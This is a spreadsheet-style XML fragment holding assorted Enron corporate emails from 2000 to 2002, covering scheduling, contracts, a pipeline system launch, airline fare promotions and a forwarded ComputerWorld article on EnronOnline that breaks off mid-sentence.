    <t>Hello!_x000D_
_x000D_
Rusty Mills is interviewing for the Day Ahead Scheduling/Analyst position on Monday, April 30th. I will be distributing a copy of his resume for your review._x000D_
_x000D_
Please note the schedule for Monday's interview:_x000D_
_x000D_
Russell "Rusty" Mills (Mt. Adams conference room)_x000D_
11:30am - Jeff Richter (Jeff will take him to lunch before or after his interview)_x000D_
12:45pm - Murray O'Neil_x000D_
1:30pm - Bill Williams III_x000D_
2:15pm - Chris Foster_x000D_
3:00pm - Todd Perry* (waiting to confirm)_x000D_
3:45pm - TBD (Laura Wente?--need to confirm)_x000D_
_x000D_
Each interview has been scheduled for 45 minutes. Interviews should last between 30-45 minutes._x000D_
_x000D_
If you have questions, please let me know. I can be reached at x8321._x000D_
_x000D_
Thanks,_x000D_
Grace</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 04:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'mary.hain@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Conference Call on Market Monitoring</t>
  </si>
  <si>
    <t xml:space="preserve"> Please let me know your availability for a conference call on February 1st _x000D_
or 2nd._x000D_
_x000D_
Thanx</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 04:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heather.kroll@enron.com', 'jeffrey.keenan@enron.com'})</t>
  </si>
  <si>
    <t>501D5A/VEPCO</t>
  </si>
  <si>
    <t>I'm trying to locate a copy of the contract to purchase the 501D5A turbine to _x000D_
see if we need to be aware of any issues in the contract. Do you have a _x000D_
copy?  If not, I can probably get a copy from EECC. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 8 Mar 2002 11:28:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'linda.trevino@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'steven.harris@enron.com', 'michelle.lokay@enron.com', 'kimberly.watson@enron.com', 'lindy.donoho@enron.com', 'mark.mcconnell@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>TW Contract/Capacity Release System Implementation</t>
  </si>
  <si>
    <t>The long awaited Transwestern web based Contract and Capacity Release system will go live Sunday March 10, 2002.  The implementation team will be on site from Saturday evening thru Sunday evening to assure the system is performing properly. Should you receive any calls from customers related to the new system please direct the calls to one of the following individuals:_x000D_
_x000D_
Elizabeth Brown - 36928_x000D_
Dennis Lee - 31715_x000D_
Linda Trevino - 35413_x000D_
Rick Dietz - 35691_x000D_
_x000D_
Thanks to all of you who provided assistance to the team the past few months.  Your imput and  cooperation was greatly appreciated.  _x000D_
_x000D_
A couple of reminders:_x000D_
_x000D_
	Houston Customer Training - Thursday March 14th &amp; Friday March 15th _x000D_
	Marketing Dept Training - Monday March 18th &amp; Thursday March 21st_x000D_
_x000D_
Call if you have further questions._x000D_
_x000D_
Thanks_x000D_
_x000D_
Linda</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 08:32:18 -0800 (PST)</t>
  </si>
  <si>
    <t>Edison Mission Marketing &amp; Trading</t>
  </si>
  <si>
    <t xml:space="preserve">Leslie,_x000D_
Can you confirm that Edison Mission Marketing &amp; Trading Inc. can trade US East power?_x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 11:29:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daily@restructuringtoday.com'})</t>
  </si>
  <si>
    <t>Here's what you're missing...</t>
  </si>
  <si>
    <t xml:space="preserve">Cinergy going into_x000D_
summer long_x000D_
on power_x000D_
_x000D_
Cinergy CEO Jim Rogers told Restructuring Today in a three-part_x000D_
interview that this summer prices will be low and electric supplies_x000D_
plentiful._x000D_
     Is it the result of the June 1998 price spike that rose to $7,500?_x000D_
Did the high price lure in generation that's now providing ECAR_x000D_
consumers with economical prices at a time when the West Coast is being_x000D_
punished for not doing the same?_x000D_
     "The short answer is yes," Rogers replied._x000D_
     ECAR is getting 4,000 mw more capacity this summer, he added._x000D_
     Rogers thinks the Ohio market will be slow to open and may not get_x000D_
robust for five years.  He was critical of other IOUs that are dragging_x000D_
their feet in RTO formation._x000D_
     We'd love to send you the Rogers interview and others we've_x000D_
published recently:_x000D_
     Walter Higgins, Sierra Nevada; Corbin McNeill from PECO Energy;_x000D_
Marce Fuller of Mirant; Erle Nye of TXU, the incoming EEI chairman -- to_x000D_
name just a few._x000D_
     If you'd like to see these in-depth interviews reply via email and_x000D_
I'll send them to you free of charge._x000D_
_x000D_
Don't miss another vital issue!  Subscribe today and start benefiting_x000D_
from Restructuring Today's special, unique focus on the converging_x000D_
energy and communications industries, especially retail markets.  Fax_x000D_
the attached order form to 202-298-8210 you won't miss another vital_x000D_
issue._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Season Hawksley_x000D_
US Publishing_x000D_
800-486-8201_x000D_
_x000D_
_x000D_
 - orderform.pdf </t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 07:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Can we meet at 5:00 today?</t>
  </si>
  <si>
    <t>Tue, 11 Apr 2000 02:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Security Request</t>
  </si>
  <si>
    <t>Thank you for your e-mail.  Please proceed with the request._x000D_
_x000D_
Thanks_x000D_
dp</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: morning 12/4</t>
  </si>
  <si>
    <t>Ditto.  Busy morning</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 08:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jared.kaiser@enron.com'})</t>
  </si>
  <si>
    <t>GISB`</t>
  </si>
  <si>
    <t>At you convenience, please give me a call re Virginia Power._x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 21:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weather Derivative GTC's with Enron Japan Corp. as Counterparty</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark-_x000D_
_x000D_
Attached are the GTC's discussed in my preceding e-mail._x000D_
_x000D_
Best regards,_x000D_
_x000D_
John_x000D_
----- Forwarded by John Viverito/Corp/Enron on 08/16/2000 04:52 AM -----_x000D_
_x000D_
	John Viverito_x000D_
	08/15/2000 01:20 AM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: Jonathan Whitehead/AP/Enron@Enron, Joseph P Hirl/AP/ENRON@ENRON_x000D_
		 Subject: Weather Derivative GTC's with Enron Japan Corp. as Counterparty_x000D_
_x000D_
Alan/David-_x000D_
_x000D_
Attached hereto, are the GTC's with Enron Japan Corp. as counterparty for EOL _x000D_
trading of Japanese weather derivative HDD swaps.  The US GTC's were utilized _x000D_
as the basis of the documentation.  The GTC's have been tailored to the _x000D_
Japanese market in conjunction with Baker &amp; McKenzie, Tokyo.  _x000D_
_x000D_
Please review and provide comments prior to loading onto the EOL system.  I _x000D_
note that September 1, 2000 is the date on which trading on this basis is _x000D_
expected to begin._x000D_
_x000D_
_x000D_
Cheers,_x000D_
_x000D_
John_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Comprehensive Settlement Agreement Exhibit List</t>
  </si>
  <si>
    <t xml:space="preserve">For those of you trying to keep track of all the documents out there, he is _x000D_
the most complete listing I have of the documents identified in support of _x000D_
the Comprehensive Settlement Agreement.? I do not have in my possession all _x000D_
of the documents.? Once I receive them, you're welcome to copies. _x000D_
_x000D_
Exhibit 1?? Comprehensive Settlement Document?? _x000D_
Exhibit 2?? Lad Lorenz Testimony _x000D_
Exhibit 3?? Eric Nelson Testimony _x000D_
Exhibit 4?? Mark Pocta Testimony _x000D_
Exhibit 5?? Tom Beach Testimony _x000D_
Exhibit 6?? Jeff Dasovich Testimony _x000D_
Exhibit 7?? Rick Counihan Testimony _x000D_
Exhibit 8?? John Burkholder Testimony _x000D_
Exhibit 9?? Paul Amirault Testimony _x000D_
Exhibit 10? Jeanne Zaiontz Testimony _x000D_
Exhibit 11? Paul McKelvey Testimony _x000D_
Exhibit 12? Jeff Fawcett Testimony _x000D_
Exhibit 13? Errata to Comprehensive Settlement Document </t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 10:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ccampbell@akllp.com', 'ben.jacoby@enron.com', 'jkeffer@kslaw.com'})</t>
  </si>
  <si>
    <t>Timing this weekend</t>
  </si>
  <si>
    <t>We would like to have the conference call at 200 CST on Sunday.  Any _x000D_
problems?  If not, can you get the word out?_x000D_
_x000D_
My number at home is 713 973 6325._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michael.moscoso@enron.com', 'sally.beck@enron.com', 'steve.jackson@enron.com'})</t>
  </si>
  <si>
    <t>Per John Lavorato,  Mike Grigsby will put 50 million in schedule C reserve on _x000D_
August 25,  Philip Allen will put 25 million in schedule C reserve on August _x000D_
25,  and Keith Holst will put 25 million in schedule C reserve on August 25.</t>
  </si>
  <si>
    <t>Tue, 1 Jan 2002 01:18:19 -0800 (PST)</t>
  </si>
  <si>
    <t>Start the New Year with These Specials, January 1, 2002</t>
  </si>
  <si>
    <t>_x000D_
=================================================================_x000D_
SOUTHWEST AIRLINES' CLICK 'N SAVE E-MAIL UPDATE_x000D_
January 1, 2002_x000D_
=================================================================_x000D_
_x000D_
THE FIRST DAY OF 2002! _x000D_
_x000D_
Horns are blowing._x000D_
We're making a toast._x000D_
_x000D_
To the greatest Customers, Coast to Coast:_x000D_
_x000D_
Here's to a New Year of LUV_x000D_
That comes from the heart_x000D_
We wish you prosperity, _x000D_
on this brand new start. _x000D_
_x000D_
Happy New Year!_x000D_
_x000D_
=================================================================_x000D_
IMPORTANT TRAVEL INFORMATION_x000D_
=================================================================_x000D_
_x000D_
For updated travel information, please visit:_x000D_
http://www.southwest.com/travel_center/travelAdvisory.html_x000D_
_x000D_
=================================================================_x000D_
THIS WEEK'S SPECIALS_x000D_
=================================================================_x000D_
1. southwest.com Specials for purchase through January 3, 2002_x000D_
2. Subscriber Information_x000D_
_x000D_
=================================================================_x000D_
CLICK 'N SAVE SPECIALS_x000D_
=================================================================_x000D_
Albany, NY_x000D_
 $77 one-way, to/from Jacksonville, FL_x000D_
 $68 one-way, to/from Louisville, KY_x000D_
  _x000D_
Albuquerque, NM_x000D_
 $99 one-way, to/from Kansas City, MO_x000D_
 $41 one-way, to/from Tucson, AZ_x000D_
  _x000D_
Amarillo, TX_x000D_
 $99 one-way, to/from New Orleans, LA_x000D_
 $63 one-way, to/from San Antonio, TX_x000D_
  _x000D_
Austin, TX_x000D_
 $42 one-way, to/from Midland/Odessa, TX_x000D_
 $99 one-way, to/from Phoenix, AZ_x000D_
  _x000D_
Baltimore Washington Int'l, MD_x000D_
 $52 one-way, to/from Chicago Midway, IL_x000D_
 $35 one-way, to/from Cleveland, OH_x000D_
  _x000D_
Birmingham, AL_x000D_
 $62 one-way, to/from Chicago Midway, IL_x000D_
 $54 one-way, to/from St. Louis, MO_x000D_
  _x000D_
Boise, ID_x000D_
 $37 one-way, to/from Reno/Tahoe, NV_x000D_
 $34 one-way, to/from Spokane, WA_x000D_
  _x000D_
Buffalo/Niagara Falls, NY_x000D_
 $48 one-way, to/from Norfolk, VA/Southern Virginia_x000D_
 $70 one-way, to/from Tampa Bay, FL_x000D_
  _x000D_
Burbank, CA_x000D_
 $35 one-way, to/from Las Vegas, NV_x000D_
 $99 one-way, to/from Portland, OR_x000D_
  _x000D_
Chicago Midway, IL_x000D_
 $52 one-way, to/from Baltimore Washington Int'l, MD_x000D_
 $62 one-way, to/from Birmingham, AL_x000D_
  _x000D_
Cleveland, OH_x000D_
 $35 one-way, to/from Baltimore Washington Int'l, MD_x000D_
 $99 one-way, to/from New Orleans, LA_x000D_
  _x000D_
Columbus, OH_x000D_
 $99 one-way, to/from Ft. Lauderdale/Hollywood, FL_x000D_
 $64 one-way, to/from Tampa Bay, FL_x000D_
  _x000D_
Corpus Christi, TX_x000D_
 $48 one-way, to/from Dallas Love Field, TX_x000D_
 $65 one-way, to/from Little Rock, AR_x000D_
  _x000D_
Dallas Love Field, TX_x000D_
 $48 one-way, to/from Corpus Christi, TX_x000D_
 $36 one-way, to/from Tulsa, OK_x000D_
  _x000D_
Detroit, MI_x000D_
 $63 one-way, to/from Omaha, NE_x000D_
 $52 one-way, to/from Raleigh-Durham, NC_x000D_
  _x000D_
El Paso, TX_x000D_
 $99 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $99 one-way, to/from Houston Hobby, TX_x000D_
 $79 one-way, to/from Los Angeles, CA_x000D_
  _x000D_
Ft. Lauderdale/Hollywood, FL_x000D_
 $99 one-way, to/from Columbus, OH_x000D_
 $34 one-way, to/from Orlando, FL_x000D_
  _x000D_
Harlingen/South Padre Island, TX_x000D_
 $89 one-way, to/from Oklahoma City, OK_x000D_
 $38 one-way, to/from San Antonio, TX_x000D_
  _x000D_
Hartford, CT/Springfield, MA_x000D_
 $99 one-way, to/from Jackson, MS_x000D_
 $50 one-way, to/from Raleigh-Durham, NC_x000D_
  _x000D_
Houston Bush Intercontinental, TX_x000D_
 $99 one-way, to/from El Paso, TX_x000D_
 $55 one-way, to/from Little Rock, AR_x000D_
 $55 one-way, to/from Oklahoma City, OK_x000D_
  _x000D_
Houston Hobby, TX_x000D_
 $99 one-way, to/from El Paso, TX_x000D_
 $55 one-way, to/from Little Rock, AR_x000D_
 $55 one-way, to/from Oklahoma City, OK_x000D_
  _x000D_
Indianapolis, IN_x000D_
 $99 one-way, to/from Manchester, NH_x000D_
 $99 one-way, to/from Providence, RI_x000D_
  _x000D_
Jackson, MS_x000D_
 $99 one-way, to/from Hartford, CT/Springfield, MA_x000D_
 $99 one-way, to/from Phoenix, AZ_x000D_
  _x000D_
Jacksonville, FL_x000D_
 $77 one-way, to/from Albany, NY_x000D_
 $40 one-way, to/from Norfolk, VA/Southern Virginia_x000D_
  _x000D_
Kansas City, MO_x000D_
 $99 one-way, to/from Albuquerque, NM_x000D_
 $99 one-way, to/from Midland/Odessa, TX_x000D_
  _x000D_
Las Vegas, NV_x000D_
 $35 one-way, to/from Burbank, CA_x000D_
 $48 one-way, to/from Oakland, CA_x000D_
 $36 one-way, to/from Phoenix, AZ_x000D_
 $40 one-way, to/from San Diego, CA_x000D_
  _x000D_
Little Rock, AR_x000D_
 $65 one-way, to/from Corpus Christi, TX_x000D_
 $55 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $55 one-way, to/from Houston Hobby, TX_x000D_
  _x000D_
Long Island/Islip, NY_x000D_
 $34 one-way, to/from Providence, RI_x000D_
 $79 one-way, to/from West Palm Beach, FL_x000D_
  _x000D_
Los Angeles, CA_x000D_
 $79 one-way, to/from El Paso, TX_x000D_
 $46 one-way, to/from Reno/Tahoe, NV_x000D_
 $99 one-way, to/from Seattle/Tacoma, WA_x000D_
  _x000D_
Louisville, KY_x000D_
 $68 one-way, to/from Albany, NY_x000D_
 $69 one-way, to/from Orlando, FL_x000D_
  _x000D_
Lubbock, TX_x000D_
 $99 one-way, to/from St. Louis, MO_x000D_
 $61 one-way, to/from Tulsa, OK_x000D_
  _x000D_
Manchester, NH_x000D_
 $99 one-way, to/from Indianapolis, IN_x000D_
 $89 one-way, to/from Nashville, TN_x000D_
  _x000D_
Midland/Odessa, TX_x000D_
 $42 one-way, to/from Austin, TX_x000D_
 $99 one-way, to/from Kansas City, MO_x000D_
  _x000D_
Nashville, TN_x000D_
 $89 one-way, to/from Manchester, NH_x000D_
 $66 one-way, to/from West Palm Beach, FL_x000D_
  _x000D_
New Orleans, LA_x000D_
 $99 one-way, to/from Amarillo, TX_x000D_
 $99 one-way, to/from Cleveland, OH_x000D_
  _x000D_
Norfolk, VA/Southern Virginia_x000D_
 $48 one-way, to/from Buffalo/Niagara Falls, NY_x000D_
 $40 one-way, to/from Jacksonville, FL_x000D_
  _x000D_
Oakland, CA_x000D_
 $48 one-way, to/from Las Vegas, NV_x000D_
 $49 one-way, to/from Seattle/Tacoma, WA_x000D_
  _x000D_
Oklahoma City, OK_x000D_
 $89 one-way, to/from Harlingen/South Padre Island, TX_x000D_
 $55 one-way, to/from Houston Bush Intercontinental, TX_x000D_
 $55 one-way, to/from Houston Hobby, TX_x000D_
  _x000D_
Omaha, NE_x000D_
 $63 one-way, to/from Detroit, MI_x000D_
 $99 one-way, to/from Sacramento, CA_x000D_
  _x000D_
Ontario, CA_x000D_
 $34 one-way, to/from Phoenix, AZ_x000D_
 $38 one-way, to/from San Jose, CA_x000D_
  _x000D_
Orlando, FL_x000D_
 $34 one-way, to/from Ft. Lauderdale/Hollywood, FL_x000D_
 $69 one-way, to/from Louisville, KY_x000D_
  _x000D_
Phoenix, AZ_x000D_
 $99 one-way, to/from Austin, TX_x000D_
 $99 one-way, to/from Jackson, MS_x000D_
 $36 one-way, to/from Las Vegas, NV_x000D_
 $34 one-way, to/from Ontario, CA_x000D_
  _x000D_
Portland, OR_x000D_
 $99 one-way, to/from Burbank, CA_x000D_
 $94 one-way, to/from Tucson, AZ_x000D_
  _x000D_
Providence, RI_x000D_
 $99 one-way, to/from Indianapolis, IN_x000D_
 $34 one-way, to/from Long Island/Islip, NY_x000D_
  _x000D_
Raleigh-Durham, NC_x000D_
 $52 one-way, to/from Detroit, MI_x000D_
 $50 one-way, to/from Hartford, CT/Springfield, MA_x000D_
  _x000D_
Reno/Tahoe, NV_x000D_
 $37 one-way, to/from Boise, ID_x000D_
 $46 one-way, to/from Los Angeles, CA_x000D_
  _x000D_
Sacramento, CA_x000D_
 $99 one-way, to/from Omaha, NE_x000D_
 $42 one-way, to/from San Diego, CA_x000D_
  _x000D_
Salt Lake City, UT_x000D_
 $50 one-way, to/from San Jose, CA_x000D_
 $49 one-way, to/from Spokane, WA_x000D_
  _x000D_
San Antonio, TX_x000D_
 $63 one-way, to/from Amarillo, TX_x000D_
 $38 one-way, to/from Harlingen/South Padre Island, TX_x000D_
  _x000D_
San Diego, CA_x000D_
 $40 one-way, to/from Las Vegas, NV_x000D_
 $42 one-way, to/from Sacramento, CA_x000D_
  _x000D_
San Jose, CA_x000D_
 $38 one-way, to/from Ontario, CA_x000D_
 $50 one-way, to/from Salt Lake City, UT_x000D_
  _x000D_
Seattle/Tacoma, WA_x000D_
 $99 one-way, to/from Los Angeles, CA_x000D_
 $49 one-way, to/from Oakland, CA_x000D_
  _x000D_
Spokane, WA_x000D_
 $34 one-way, to/from Boise, ID_x000D_
 $49 one-way, to/from Salt Lake City, UT_x000D_
  _x000D_
St. Louis, MO_x000D_
 $54 one-way, to/from Birmingham, AL_x000D_
 $99 one-way, to/from Lubbock, TX_x000D_
  _x000D_
Tampa Bay, FL_x000D_
 $70 one-way, to/from Buffalo/Niagara Falls, NY_x000D_
 $64 one-way, to/from Columbus, OH_x000D_
  _x000D_
Tucson, AZ_x000D_
 $41 one-way, to/from Albuquerque, NM_x000D_
 $94 one-way, to/from Portland, OR_x000D_
  _x000D_
Tulsa, OK_x000D_
 $36 one-way, to/from Dallas Love Field, TX_x000D_
 $61 one-way, to/from Lubbock, TX_x000D_
  _x000D_
West Palm Beach, FL_x000D_
 $79 one-way, to/from Long Island/Islip, NY_x000D_
 $66 one-way, to/from Nashville, TN_x000D_
_x000D_
=================================================================_x000D_
IMPORTANT DETAILS_x000D_
=================================================================_x000D_
*Available only on southwest.com._x000D_
*21-day advance purchase required._x000D_
*Available on published, scheduled service._x000D_
*Fares shown are one-way and do not include federal_x000D_
 excise tax of up to $3.00 for each flight segment. _x000D_
 (a segment is defined as a takeoff and landing)_x000D_
*Fares do not include airport-assessed passenger _x000D_
 facility charges (PFC) of up to $9 one-way._x000D_
*Fares do not include security fee._x000D_
*Fares are nonrefundable, but (except for tickets _x000D_
 purchased through our Group Tickets Program) _x000D_
 may be applied toward future travel on Southwest Airlines. _x000D_
*Travel January 21, 2002 through end of schedule, _x000D_
 except May 24, and 27, 2002._x000D_
*Purchase through January 3, 2002,  midnight Pacific Time._x000D_
*Fares are available one-way or can be combined _x000D_
 with other fare types.  Most restrictive rules of combined_x000D_
 fares will apply._x000D_
*Penalty applies to any changes made after purchasing_x000D_
 Southwest Internet Specials._x000D_
_x000D_
For more details, please visit us at:_x000D_
http://www.southwest.com/jp/hotfares2.shtml?src=e010102_x000D_
_x000D_
=================================================================_x000D_
ADDITIONAL INFORMATION_x000D_
=================================================================_x000D_
Additional information you need to know about all of our _x000D_
air fare specials:_x000D_
_x000D_
*Changes to any portion of the reservation _x000D_
 (flight, dates, cities, and/or names of passengers), _x000D_
 once purchased, will result in the cancellation of _x000D_
 the ENTIRE reservation and rebooking at the lowest _x000D_
 fare available which could result in a fare increase. _x000D_
*Southwest specials are nonchangeable _x000D_
 and nonrefundable. _x000D_
*Ticketless Travel may be purchased online using _x000D_
 either a credit card or by utilizing funds from a _x000D_
 previously unused or cancelled Ticketless _x000D_
 Travel reservation(s).  Funds from up to four cancelled _x000D_
 or unused Ticketless Travel reservation records can _x000D_
 be combined to purchase a new Ticketless Travel_x000D_
 reservation record.  Southwest Airlines travel credit _x000D_
 (e.g., travel voucher, gift certificate, discount coupon) _x000D_
 may not be used as forms of payment for _x000D_
 Ticketless Travel Online._x000D_
*Unused funds may be applied toward future travel on _x000D_
 Southwest Airlines within one year of the original purchase date._x000D_
*Seats are limited and won't be available on some _x000D_
 flights that operate during very busy travel times _x000D_
 and holiday periods such as Presidents Day and Memorial Day._x000D_
*Standby travel requires an upgrade to the _x000D_
 full unrestricted fare._x000D_
_x000D_
=================================================================_x000D_
SUBSCRIBER INFORMATION _x000D_
=================================================================_x000D_
Please pass this great news on to your friends._x000D_
To subscribe to Southwest Airlines Click 'n Save E-mail _x000D_
Updates, visit: _x000D_
http://www.southwest.com/email/_x000D_
_x000D_
Remember, if you change your Internet service provider,_x000D_
you will need to unsubscribe and resubscribe in order _x000D_
to continue receiving Click 'n Save E-mail Updates._x000D_
For administration on your e-mail subscription, please visit:_x000D_
http://www.southwest.com/email/emailUnsubscribe.html_x000D_
_x000D_
=================================================================_x000D_
You may retrieve and print a copy of your Southwest _x000D_
Airlines Ticketless Travel at: _x000D_
http://www.southwest.com/travel_center/retrieveItinerary.html_x000D_
_x000D_
Questions about your flight arrival or departure time?  _x000D_
Please visit us at:_x000D_
http://www.southwest.com/cgi-bin/selectFlight_x000D_
_x000D_
=================================================================_x000D_
_x000D_
This is a post only mailing from Southwest Airlines._x000D_
Please do not attempt to respond to this message._x000D_
_x000D_
Copyright 2002 Southwest Airlines Co. All Rights Reserved._x000D_
_x000D_
_x000D_
---_x000D_
You are currently subscribed to special-offers as: dperlin@enron.com_x000D_
You can unsubscribe anytime at http://www.southwest.com/email/</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 07:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Wolak's report</t>
  </si>
  <si>
    <t xml:space="preserve">Joe Attached find the report you requested.  Alan - Governor Davis offered a _x000D_
highly discounted forward contract ($45-50/MWh) at the FERC settlement _x000D_
conference today.  As usual, California is trying to get its refund with or _x000D_
without FERC requiring it.  Alan - Tim and Joe will likely need your _x000D_
assistance with this settlement negotiation. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 15:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Jeff,_x000D_
	Sorry for all the resumes lately, but everyone wants to get their foot in the door at Enron.  This resume is from my wife's cousin, who is looking to get a summer internship at Enron.  She is a very sharp young lady with a great work ethic.  I don't know if you are hiring for internships, if not, could you please forward this on to the person hiring for those positions.  I greatly appreciate any help you could give.  Let me know if you have any further questions.  Thanks again for your help._x000D_
_x000D_
Laura Perkins_x000D_
_x000D_
 - resumefinal.doc </t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 00:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Juiced - ComputerWorld</t>
  </si>
  <si>
    <t xml:space="preserve">Karen, yes i like the "sauces" reference.  I sound like an idiot.  I can _x000D_
understand his mistake but i thought i discussed what it meant.  Skilling _x000D_
will love that reference._x000D_
mike_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Karen Denne@ENRON_x000D_
11/20/2000 04:23 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Juiced - ComputerWorld_x000D_
_x000D_
Mike -- As soon as I get hard copies of the article, I'll send them to you.  _x000D_
The article is also on ComputerWorld's website.  (FYI, your quote should be _x000D_
"Might we get into softs or meats or grains."  i checked my notes...)  karen _x000D_
---------------------- Forwarded by Karen Denne/Corp/Enron on 11/20/2000 _x000D_
04:21 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ann M Schmidt                           11/20/2000 02:30 PM_x000D_
	_x000D_
_x000D_
To: Mark Palmer/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Meredith _x000D_
Philipp/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron, Elizabeth _x000D_
Linnell/NA/Enron@Enron, Eric Thode/Corp/Enron@ENRON, Laura _x000D_
Schwartz/Corp/Enron@Enron, Jeannie Mandelker/HOU/ECT@ECT, Mary _x000D_
Clark/Corp/Enron@ENRON, Damon Harvey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Keith Miceli/Corp/Enron@Enron, Richard Shapiro/NA/Enron@Enron, James D _x000D_
Steffes/NA/Enron@Enron, Iona Maclean/LON/ECT@ECT, Katy Lomax/LON/ECT@ECT, _x000D_
Vance Meyer/NA/Enron@ENRON, John Ambler/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Juiced - ComputerWorld_x000D_
_x000D_
_x000D_
Juiced_x000D_
_x000D_
By Julia King and Gary H. Anthes_x000D_
(Nov. 20, 2000) Wall Street analysts and oil industry executives were thick _x000D_
among the legion of skeptics who thought Enron Corp. President and Chief _x000D_
Operating Officer Jeff Skilling was nuts to launch a Web site for the trading _x000D_
of natural gas and electricity over the Internet. _x000D_
That was last November, before EnronOnline locked up more than $120 billion _x000D_
in transactions in its first few months of operation, quickly establishing _x000D_
itself as the world's largest e-commerce company. As of Oct. 11, just prior _x000D_
to Enron's report of its third-quarter earnings, EnronOnline had executed _x000D_
more than 350,000 transactions, representing a gross value of $183 billion. _x000D_
Since then, the $40 billion Houston-based energy giant has elbowed its way _x000D_
into several new diversified markets. And it plans to continue its push into _x000D_
many more, ranging from railcar cargo space to broadband networking and _x000D_
data-storage capacity. _x000D_
In doing so, Enron is turbocharging its transformation from a stodgy, _x000D_
old-line fuel company to an entirely new kind of business-to-business market _x000D_
maker, with information technology and an all-out emphasis on _x000D_
entrepreneurship at the heart of its New Economy operations. Enron has been _x000D_
so successful in leveraging IT to pioneer new markets that others are trying _x000D_
to emulate its approach. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
First to Market _x000D_
"Enron often introduces a product before the competition even senses a market _x000D_
exists," the company says in its latest annual report. A prime example: _x000D_
online trading of data-network capacity. _x000D_
Indeed, "there's a low degree of awareness [among carriers] about the _x000D_
bandwidth-trading business," and Enron is ahead of the game, says Seth Libby, _x000D_
an analyst at The Yankee Group in Boston. _x000D_
At present, there are only a handful of network professionals who are aware _x000D_
of these capacity commoditization plans, says Libby. But not for long, _x000D_
asserts Enron President?? Jeff Skilling. "Within five years, the bandwidth _x000D_
market may be bigger than the gas and electric markets," he says. "So for us, _x000D_
it could be as big as the rest of our existing energy business." That's _x000D_
currently a $35 billion business. _x000D_
But critics say trading bandwidth is much more complicated than trading gas, _x000D_
especially for a company with little depth in telecommunications. And critics _x000D_
add that although carriers stand to benefit from the ability to buy and sell _x000D_
capacity, they might prefer to do it through some channel that's independent _x000D_
of the control of a single market maker like Enron. _x000D_
"Enron's argument is that its trading capabilities are the differentiator, _x000D_
and that it need not have deep telecom expertise," says Lisa Pierce, an _x000D_
analyst at Giga Information Group in Stamford, Conn. "But I'm not convinced _x000D_
it's that simple. Technology isn't a long-term competitive differentiator." _x000D_
Houston-based Enron Broadband Services Inc., formed last year, offers IP _x000D_
transport on its 15,000-mile fiber-optic network. Enron Broadband Services _x000D_
also trades - that is, makes a market by buying and selling - network _x000D_
capacity to and from other data carriers, conducting some of the transactions _x000D_
on EnronOnline. _x000D_
Enron Broadband Services also offers content-oriented services, such as a _x000D_
video-on-demand service it will market with Dallas-based Blockbuster Inc. to _x000D_
home viewers starting next month. _x000D_
"When we started the gas business, they told us we were nuts," Skilling says. _x000D_
"They said, 'You're going to sell gas but not own production? How does that _x000D_
work?' Then we did electricity and they said we were nuts again, and even _x000D_
louder than before. They said this stuff moves at the speed of light; you can _x000D_
never create a market. Then in telecommunications, they said we were nuts _x000D_
again." _x000D_
Despite its share of skeptics, some experts like Enron's prospects in this _x000D_
